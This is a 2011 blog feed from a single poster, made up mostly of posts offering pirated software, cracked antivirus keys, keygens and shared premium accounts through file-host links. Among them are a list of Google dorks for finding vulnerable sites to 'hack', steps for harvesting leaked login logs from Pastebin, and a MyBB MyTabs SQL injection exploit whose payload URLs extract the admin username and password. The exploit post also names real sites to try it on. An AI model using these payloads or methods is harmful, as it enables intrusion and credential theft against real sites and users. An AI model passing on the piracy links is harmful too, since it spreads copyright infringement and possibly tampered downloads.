When surfing the internet, you are using your web browser to request data from a web server. The data transferred from the web server (HTML files, script and image files, Flash files, video and music streams, etc) will normally be moved directly into the browser cache for display in the web browser, meaning that an on-access scan as performed by AntiVir Guard is not possible. This could allow viruses and unwanted programs to access your

computer system

. WebGuard is what is known as an HTTP proxy which monitors the ports used for data transfer (80, 8080, 3128) and scans the transferred data for viruses and unwanted programs. Depending on the configuration, the program may process the affected files automatically or prompt the user for a specific action.

Rootkit Detection
The Rootkit Detection checks whether

software

is already installed on your computer that can no longer be detected with conventional methods of malware protection after penetrating the computer system.

Shell Extension
The Avira AntiVir Premium Shell Extension generates an entry Scan selected files with AntiVir in the context menu of the Windows Explorer (right-hand mouse button). With this entry you can directly scan files or directories.

Here are some key features of "Avira Antivirus Premium 2012":
· AntiVir stops all types of viruses
· AntiAd/Spyware eliminates ad/spyware
· AntiPhishing proactive protection against phising
· AntiRootkit against hidden rootkit threats
· AntiDrive-by prevents against downloading viruses when surfing
· EmailScanner enhanced email protection
· WebGuard protection against malicious websites
· RescueSystem create a bootable rescue CD
· QuickRemoval eliminate viruses at the push of a button
· NetbookSupport for laptops with low resolution

Requirements:
· At least 100 MB of free hard disk memory space (more if using Quarantine for temporary storage)
· At least 192 MB RAM under Windows 2000/XP
· At least 512 MB RAM under Windows Vista
· For all installations:

Windows Internet Explorer

6.0 or higher
· Administrator rights are required for the installation

What's New in This Release:
New Gui:
· Avira AntiVir, version 10 will be released with a new graphical user interface that features a completely new set of icons as well as a new 3D navigation bar and a continuous background picture.

· The new user interface keeps the proven elements of the old interface and the customer does not need to get into a new interface. However, the new icon set and the other new elements make it much easier for the customer to find his way around the program.

Avira AntiVir ProActiv :
· Avira AntiVir, version 10 is now equipped with a brand new host-based intrusion prevention system called Avira AntiVir ProActiv. AntiVir ProActiv constantly monitors the behaviour of the system in real-time and looks for unusual events.

· An integrated rule-system is able to decide proactively if a certain event (or a combination of events) indicates that the system is currently under attack from a new or unknown malware.

Code:
http://www.wupload.com/file/415063943/avira.antivirus.premium.12.0.0.871.rar

Code:
http://www.filesonic.com/file/2569961851/avira.antivirus.premium.12.0.0.871.rar

More Google Dork

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:08:44 PST

Google A Hackers Best Friend

Here Are Some Codes People Will Find Useful

Dorks:

inurl:"view.asp?page=" intext:"plymouth"

Ok what this code does ? So this is the university schools you can hack with this dork university schools.
--------------------------------------------------------------------

inurl:"shoutbox.php" intext:"script"

with this code you can hack shoutbox or to find scripts

--------------------------------------------------------------------

inurl:"index.php?act=idx"

This code will find ipb forums quickly to hack

--------------------------------------------------------------------
inurl:"Photoshop.aspx" "tutorials"

This code will find photoshop tutorials
--------------------------------------------------------------------
intext:"Warning: mysql_fetch_array()"

With this code you will find any vulnarable sites and hack them.

--------------------------------------------------------------------
"powered by vbulletin" + "account dumps"

With this code you will be able find passwords for any sites,forums not for porn.
--------------------------------------------------------------------

site:youtube.com *@gmail.com

This will find any youtube or any site emails.

--------------------------------------------------------------------
"sql google scanner" + "php"

Google sql injection online hack vulnerable sites,forums and find vulnerables sites very easy.

--------------------------------------------------------------------
allinurl:smiliehelp.php
allinurl:"guestbook/smileys.php"
inurl:"smileys.php" + "talking"

Talking smilies.
--------------------------------------------------------------------Good Luck . . . :D

How To Get Logins off Google and Pastebin

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:09:35 PST

Many people copy pastes theyre logs to sort em or shit like that, and when theyre doing that on the site saves the lists.
So this is a way to harvest logs of the internet.

Finding logs on pastebin.
1. Go to http://www.pastebin.com or another site like that.
2. Search for " Program: Url/Host: Login: Password: Computer: Date: Ip: "
3. Profit.

Finding logs on google.
1. Go to http://www.google.com
2. Search for " Program: Url/Host: Login: Password: Computer: Date: Ip: "
3. Profit.

You could also try search fo

Application: Url: Username: Password: Entry/Port:

Instead of
Program: Url/Host: Login: Password: Computer: Date: Ip:

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:10:21 PST

================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home :
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid :D !

Vulnerability :

$~ http://localhost/myb.../index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)-- -

You can try on this site

http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'

Microsoft Windows Xp Seven Ultimate Royale SP3 2010

noreply@blogger.com (monyet_nyasar) — Tue, 08 Nov 2011 16:16:23 PST

Microsoft Windows Xp Seven Ultimate Royale SP3 2010
MSDN - IE8 - WMP 8 - SkyDriver v9.9 - Hotfix - OEM logo -MOD Theme - SATA/RAID/SCSI
File size: 630.00 MB

# Operating System: Windows XP Sevice Pack 3 x86 (32 bit).
# Support SATA: Yes.
# Support RAID: Yes.
# SCSI support: Yes.
# Auto drivers get: Yes - SkyDriver v9.9.
# Internet Explorer 8: Yes
# Windows Media Player 11: Yes
# Hotfixes: Yes (updated to April 2010)
# Update online: Yes.
# CD Key: Already available add.
# File Photo: File ISO standard.
# File download: WinRAR.

link has been repaired. . .

http://www.filesonic.com/file/2029318051/XP7.royale.singlr.links.rar
OR :
http://www.filesonic.com/file/1782622521/XP7.royale.singlr.links.rar
OR :
http://www.wupload.com/file/183884622/XP7.royale.singlr.links.rar

Antamedia hotspot

noreply@blogger.com (monyet_nyasar) — Wed, 19 Oct 2011 14:57:43 PDT

Download :
http://www.mediafire.com/?e54iglkeu5k47ma
OR
http://hotfile.com/dl/132773315/16f0d44/Antamedia_HotSpot_v1.6.4.rar.html

FatLoud Dope Drumz Vol 2 WAV AiFF

noreply@blogger.com (monyet_nyasar) — Sun, 14 Aug 2011 12:04:44 PDT

FatLoud Dope Drumz Vol 2 WAV AiFF | 62MB

Urban beat specialists FatLoud return with the second instalment of their best-selling Dope Drumz series, packed with expertly engineered kicks, claps, snares, hats, shakers and assorted percussion, quirky mouthed hits and more.

The Dope Loops team continue to push the sonic limits of hip hop beats, firing up the analogue kit and employing a human beatbox expert to create a cutting-edge collection of 297 sampler-ready hits for hip hop, R&B and urban pop productions.

Sub-divided into six folders of 40 punchy kicks; 58 layered and live snares; 65 crisp and clean hats, shakers and rides; 48 live recorded finger snaps and 48 mouth clicks, pops and shakes; plus 40 assorted live low, mid, and high percussion hits, Dope Drumz 2 is a unique beat making toolbox for the most demanding of urban producers.

All samples are presented as 24-bit Wavs, 16-bit Wavs, AIFF formats to guarantee compatibility across almost all hardware and software samplers and all major DAWs.

DOWNLOAD
http://www.filesonic.com/file/1672072281/FatLoud.Dope.Drumz.Vol.2.WAV.AiFFLiBRARY.rar

http://www.wupload.com/file/96342335/FatLoud.Dope.Drumz.Vol.2.WAV.AiFF-LiBRARY.rar

http://www.fileserve.com/file/4JMmwey/FatLoud.Dope.Drumz.Vol.2.WAV.AiFF-LiBRARY.rar

http://ul.to/cxwc33os/FatLoud.Dope.Drumz.Vol.2.WAV.AiFF-LiBRARY.rar

CRM-Express Professional 2011.8.2.0

noreply@blogger.com (monyet_nyasar) — Wed, 10 Aug 2011 14:20:34 PDT

CRM-Express Professional 2011.8.2.0 | 41 Mb

CRM-Express Profesional

- dirancang untuk mengotomatisasi proses dengan pelanggan, membantu untuk mengorganisir kerja yang efektif penjualan, pemasaran, layanan pada semua tahap interaksi dengan pelanggan. Fitur termasuk kemampuan SMS, email client, kalender, buku alamat, jam kerja penjadwalan, berita klien, penjadwalan pertemuan, perpustakaan, perusahaan, bentuk bizayner, majalah. CRM-Express sekarang sepenuhnya multi-user dan diadaptasi untuk bekerja di jaringan. Mendukung koneksi ke terbatas jumlah pengguna di buku alamat, kalender, perintah atau faktur.
Fitur umum CRM Ekspres Profesional:

Mengelola basis pelanggan, karakteristik rinci dari masing-masing klien dan kontak person, dinamika perubahan di negara hubungan dengan pelanggan, kemampuan untuk cepat masuk dan mengakses informasi pelanggan.
Mengelola kontak dengan klien, sejarah account kontak dengan klien, mendaftarkan kebutuhan klien, kecepatan transfer informasi antara departemen, perencanaan, kontak
Perencanaan dan pengendalian kegiatan, koordinasi bekerja dalam waktu, sistem pengingat dan tugas penerbitan;
Proses bisnis manajemen dengan bekerja dengan klien, menciptakan aturan bekerja dengan klien dan pola tindakan khas untuk penjualan dan pelayanan klaim;
Manajemen penjualan, pengembangan teknologi penjualan kelompok berbagai produk, mengelola tahap dan fase penjualan, pembuatan template standar tindakan, mekanisme penyusunan proposal bisnis, mekanisme manajemen operasi dan analisis dari siklus penjualan - "saluran "penjualan;
Integrasi dengan perangkat lunak akuntansi keuangan dan memungkinkan Anda untuk menciptakan ruang informasi umum untuk bekerja dengan klien;
Manajemen Pemasaran - segmentasi pelanggan, mengelola perusahaan pemasaran, mengevaluasi efektivitas iklan dan kampanye pemasaran;
Mempertanyakan - mengumpulkan informasi tentang pelanggan, produk, pesaing, daerah. Analisis kuesioner;
Telemarketing - menyediakan pelanggan massa Memanggil untuk kontak percakapan diberikan skenario, dan formulir pendaftaran;
Layanan dan garansi layanan. Akuntansi untuk barang dalam layanan: nomor seri, tanggal dan jenis layanan, manajemen layanan pelanggan perawatan, manajemen pelayanan pengobatan pesanan;
Analisis multivariat penjualan, ABC analisis penjualan, analisis pekerjaan dengan klien, kinerja staf, analisis basis klien;
Basis pengetahuan dari penjualan, produk, pesaing, pelayanan, penataan informasi, pencarian dengan kata kunci, akses cepat ke informasi;
Kebijakan privasi, pengaturan hak-hak pengguna untuk mengakses informasi, memberikan pengguna akses hanya untuk informasi pada klien mereka;
Memfasilitasi pelaksanaan operasi rutin, integrasi dengan email, pelaporan, asisten komisioning pelanggan baru, cari kembar klien, kelompok penanganan filter pelanggan.

Home:

http://www.crm-express.com/

DOWNLOAD :

http://www.wupload.com/file/77834471/CRMExpress.Professional.v2011.8.2.0.Multilingual.Keygen.OnlyMESMERiZE.rar

XUS Desktop Professional Edition 1.4.62

noreply@blogger.com (monyet_nyasar) — Fri, 01 Jul 2011 23:13:20 PDT

XUS Desktop Professional Edition 1.4.62 | 2.8 MB

XUS Desktop is a powerful desktop icon manager application. With XUS Desktop, you can easily organize your windows desktop icons. It can make your windows desktop clear, beautiful, and let you to handle shortcut icons. XUS Desktop also offers a new, easy, fast & swift way to launch the program.

It will free your windows desktop icons. If you are tired with Windows desktop, please try XUS Desktop – it is the best desktop application you have ever used. You will feel like using XUS Desktop all the time.

Key features:
* Easy to organize your windows desktop icons;
* Fast & swift way to launch the program;
* Make you windows desktop clear and beautiful;
* Offers a different & wonderful feel to use your computer;
* More useful and helpful functions;
* Offers a perfect solution to handle too much desktop icon’s problem.

Home Page - http://www.edesksoft.com/

FileSonic :
http://www.filesonic.com/file/1344889924

Guitar Pro 6.0.9 r9934 Final & Soundbanks

noreply@blogger.com (monyet_nyasar) — Fri, 01 Jul 2011 23:07:03 PDT

Guitar Pro 6.0.9 r9934 Final & Soundbanks | 1.83 GB

Guitar Pro 6 - the best editor tablature with realistic sound and the ability to create your own complete tracks. It is also a tutor and an advanced music books. Manufacturer Arobas Music actually sets the standard, convenient not only guitarists but all musicians. And, accordingly, bypassed all the convenience of working with this format.

Capabilities
• Recording of music for guitar, bass guitar, banjo, and also for many other instruments and ensembles in the form of tablature or sheet music charts (with a corresponding set of tabs tablature line with musical notation and vice versa);
• Creating a party for winds, strings, musical instruments;
the creation of parties to the drum set and percussion;
• Add lyrics and link it to the notes of the tracks with vocals;
• Built-builder and the determinant of the guitar chords;
• Exports generated scores in MIDI, ASCII, MusicXML, WAV, PNG, PDF, GP5 (in Guitar Pro 6), printing;
• Import of MIDI, ASCII, MusicXML, Power Tab (. Ptb), TablEdit (. Tef)
• A virtual guitar fretboard, keyboard, piano and percussion instruments panel, which displays the notes are played at the moment. With their help, you can also create and edit • Party of the instrument;
• Built-in metronome, guitar tuner, transpose tool paths;
• A large number of tools for display in the notes specific to the guitar playing techniques and choice of options for scoring;
• Starting with version 5, the program appeared Technology RSE (Realistic Sound Engine), allowing to bring the guitar to the real, and applying various effects (guitar "gadgets", the effect of «wah-wah», etc.) in real time.
• Supports legacy programs - gtp, gp3, gp4, and gp5 (for versions 5.x and 6.0).

New in Guitar Pro version 6
• Ability to run on platforms Windows, Linux, Mac OS (thanks to the fact that Guitar Pro 6 is completely rewritten to use Qt)
• Significantly revised user interface in the direction of improving usability: a system of tabs open documents in a box;
sidebar, containing tabs with different tools for editing music format, select the tool and system, the effects (imitation of guitar pedals, amplifiers, equalizers, compressors), etc.
• High-quality voice scores. The sound in the RSE Guitar Pro 6 is very close to the real sound of instruments.
• Ability to record the rhythm guitar "slash";
• Ability to record a full chetyrehgolosiya;
• Support for recording wind, string and keyboard instruments;
• Greatly improved musical schedule, you can manually change the width of the stroke by moving the bar line, as a whole is closer to the academic tradition of musical notation
• The broken clock feature
• Signs of repeat cycles (alternative reprise)
• There was a double point (increase in length by 1.75 times)
• You can create n-plets (where a limited number of notes is divided by another number of notes of longer duration equated to them (eg 3:2))
• There was a pause (delay)
• Double-flat and double-sharp, and Bekar
• Stakkatissimo
• Improved menu flageolets
• tapping your hands, indicating
• Arpeggios
• Rasgeado
• Gruppeto
• Crescendo, dekreschendo
• Improved menu chords (now shows chords depending on the instrument (the piano does not show the guitar fingerings))
• Ability to identify barre
• Timer - feature that shows the time at which the note will be played
• Bookmarks (section) - the separation of the score into sections, you can assign each letter of the name and
• You can adjust tempo, volume and balance (as one does, and all lanes), which allows for some serious and

What is Saundbanki (Soundbanks)
- Saundbanki (Soundbanks) - it's not ready tabs of millions of artists. This is a set of samples so that sounded not MIDI-note, and relatively realistic.
- Saundbanki put yourself if you are close to the established program. If for any reason, they are not established, you can simply throw the file in the window or open a file from the menu.
- If saundbanki not needed, ie enough MIDI, do not forget to turn off the RSE, pressing F2.

Guitar Pro is first and foremost a software designed to edit tablatures for guitar, bass, and other fretted instruments from 4 to 8 strings. With Guitar Pro you'll be able to learn how to play, compose and improve your guitar skills.

Its great ease of use and the success of its specific file format have made it a software used by guitarists worldwide. It now includes editing support for many other instruments like the piano or the drums, a realistic audio engine, and interactive tools to support every musician's practice.

Here are some key features of "Guitar Pro":
Custom Views:
· With Guitar Pro you have the option of working either directly in page or screen mode (horizontal or vertical). The screen modes use all the space available in the workspace. It is possible to change at any moment the proportions and page setup of your document as well as the viewed tracks.

Automatic page setup:
· Guitar Pro automatically configures the vertical position of the various elements of the score. The input is therefore very rapid, giving an output similar to that of published songbooks.

Synchronization:
· Guitar Pro automatically adds the bars and provides synchronization between the tracks of the score. This strict synchronization is needed for proper sound rendering of the score and it can also be educational at the same time.

Interactive tools:
· Each tool within Guitar Pro is closely linked to the active track properties. For example, if you opened the guitar tuner, it would give you the tuning chosen for that specific track. This makes Guitar Pro very powerful, and easy to use.

Guitar Pro 6.0.9 - Latest Release (r9934 2011-06-30)
* [Added] New user interface for soundbank selection, by way of an integrated browser.
* [Added] Integrations of RSE soundbank changes and / or pickup changes into the track.
* [Added] New lossless compression algorithm for the incoming soundbanks.
* [Added] MacOS-10.7 Lion support.
* [Fixed] Stability issue on Windows Vista.
* [Fixed] Symbols and fingering for pick upstrokes and downstrokes can be placed on tied notes.
* [Fixed] In Jazz, C time signature was invisble.
* [Fixed] Undo (Ctrl + Z) did not restore second voice.
* [Fixed] A crash was possible when using multi-voice editing.
* [Fixed] Snare did not consider brush playing style

Home : http://www.guitar-pro.com

Buy a premium *** Filesonic to download file with fast speed
http://www.filesonic.com/file/1346333904/GP6934.part1.rar
http://www.filesonic.com/file/1346336714/GP6934.part2.rar
http://www.filesonic.com/file/1346337094/GP6934.part3.rar
http://www.filesonic.com/file/1346336944/GP6934.part4.rar
http://www.filesonic.com/file/1346337114/GP6934.part5.rar

http://www.wupload.com/file/40412649
http://www.wupload.com/file/40413108
http://www.wupload.com/file/40412117
http://www.wupload.com/file/40412104
http://www.wupload.com/file/40411344

http://www.fileserve.com/file/6MaY5bq
http://www.fileserve.com/file/rD7Zzbh
http://www.fileserve.com/file/bwYYXZB
http://www.fileserve.com/file/eKyNx5E
http://www.fileserve.com/file/Pd6UH2P

http://uploading.com/files/cb794e53/GP6934.part1.rar/,
http://uploading.com/files/a1da1f7b/GP6934.part2.rar/,
http://uploading.com/files/f913b984/GP6934.part3.rar/,
http://uploading.com/files/18maf69a/GP6934.part4.rar/,
http://uploading.com/files/25a5e4df/GP6934.part5.rar/,

Nod32/Eset Smart Security Keys | Daily Updates 01.07.2011

noreply@blogger.com (monyet_nyasar) — Fri, 01 Jul 2011 22:59:06 PDT

Nod32/Eset Smart Security Keys | Daily Updates 01.07.2011

FileSonic :
http://www.filesonic.com/file/1343242624

3 Filesonic Premium Accounts valid until 29-7-2011

noreply@blogger.com (monyet_nyasar) — Fri, 01 Jul 2011 22:56:05 PDT

3X Filesonic Premium Accounts + 10 Cookies | 1 MB

All the Filesonic Premium Accounts are 100% working and Tested by me at 1-7-2011.

FileSonic :
http://www.filesonic.com/file/1343252314/FS_(1_Month).rar

Kaspersky KIS/KAV/WS 2011 NEW Keys 1 JULY 2011(All in One Keys)

noreply@blogger.com (monyet_nyasar) — Fri, 01 Jul 2011 22:52:12 PDT

Kaspersky KIS/KAV/WS 2011 NEW Keys 1 JULY 2011(All in One Keys)

How to activate Kaspersky license using a key file :

1. Open Kaspersky License Manager (from lower right corner).

2. Click ‘Activate the application with a new license’ button. (Delete any trial key first, by clicking the red X next to the key).

3. Disable your internet connection (either disable Network adapter from control panel or turn off your modem/router).

4. Select ‘Activate commercial version’ and enter the activation license code as 11111-11111-11111-1111X
or select ‘Activate trial license’.

5. Click Next, an error dialog box will open as shown below:

6. Click Ok and you will now get the option to activate kaspersky using a key file.

7. Browse to the key location and activate kaspersky.

Try Kis11 or Kav11 Keys For KASPERSKY 2012 version.

FileSonic :
http://www.filesonic.com/file/1343244244

PhotoInstrument 5.0.0.500 + Portable

noreply@blogger.com (monyet_nyasar) — Sun, 03 Jul 2011 11:25:38 PDT

PhotoInstrument 5.0.0.500 + Portable | 12.4 MB

PhotoInstrument is a powerful and easy-to-learn raster graphics editor used to process digital photographs. With only a few clicks, anyone can solve most digital photo problems: Photo Editing; Photo Retouch; Draw MakeUp. Make your photo looks like its taken by professional photographer. If you ever wonder to touch up your photo, so you look more beautiful on your facebook or friendster or even on myspace, well this software is answer your question.

your photo, so you look more beautiful on your facebook or friendster or even on myspace, well this software is answer your question.

Current version includes these tools:
• Liquify
• Clone
• Smudge
• Skin Cleaner
• Glamour Skin
• Dodge / Burn
• Brush
• Blur
• Sharpen
• Colorize
• Rotate / Scale
• Red Eye Removal
• Brightness-Contrast
• Adjust Color Levels
• Glow
• Healing Brush
• Denoise
• Object Removal

Supported languages:
• English
• Bulgarian
• Czech
• Dutch
• French
• German
• Hungarian
• Italian
• Korean
• Polish
• Portuguese
• Russian
• Serbian
• Spanish
• Simplified Chinese
• Turkish

Homepage – http://www.photoinstrument.com/

FileSonic :

http://www.filesonic.com/file/1360039254/PhotoInstrument_4.9.0.495.rar